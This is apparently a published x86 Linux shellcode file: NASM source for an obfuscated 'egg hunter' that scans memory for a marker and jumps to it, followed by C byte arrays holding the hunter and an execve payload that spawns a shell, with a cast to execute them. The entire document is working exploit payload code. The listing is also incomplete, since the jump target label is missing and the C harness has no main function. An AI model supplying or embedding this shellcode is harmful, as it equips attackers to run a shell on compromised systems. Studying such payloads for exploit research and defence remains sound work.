;author: Filippo "zinzloun" Bersani
;date: 28/11/2016
;version: 1.0
;X86 Assembly/NASM Syntax
;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit
; Linux ubuntu 3.13.0-100-generic #147~precise1-Ubuntu 32bit
; Linux bb32 4.4.0-45-generic 32bit
; description
; egg hunter shellcode: different approach to the classic jpc technique using fstenv and dynamic memory location
; plus a bit of obfuscation to generate the egg mark
; execute a shell
; see comment for details
global _start
section .text
fstenv [esp-0xc] ;fstenv getpc: the entry mem addr of this code (_start)
pop esi ;pop it in esi
xor eax,eax
mov al, 0x1f ;set the offset bytes to point at the end of the program
add esi, eax ;set the mem addr dinamically
mov edx, dword 0x65676760 ;a dumm value..
rol edx, 0x4 ;get the real mark: 56767606
add esi,4 ;scan the next section of mem, since we are in 32 arch we need to add 4 bytes
cmp[esi], edx ;check if we have found the egg...
jz find_egg ;loop
call esi ;found our egg (zero flag is set), jump to the execution of the shellcode
unsigned char egg_hunter[] = \
"\xd9\xeb\x9b\xd9\x74\x24\xf4\x5e\x31\xc0\xb0\x1f\x01\xc6\xba\x60\x67\x67\x65\xc1\xc2\x04\x83\xc6\x04\x39\x16\x74\xf9\xff\xd6"; //the actual egg hunter code
unsigned char shell_code[] = \
"\x31\xc0\xb0\x05\xfe\xc0\xfe\xc8\xb0\x06\x90" //dumm instructions
"\x06\x76\x76\x56" // egg id reversed
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"; // /bin/bash
printf("Egg hunter length: %d\n", strlen(egg_hunter));
printf("Total length: %d\n", strlen(egg_hunter)+strlen(shell_code));
int (*ret)() = (int(*)())egg_hunter;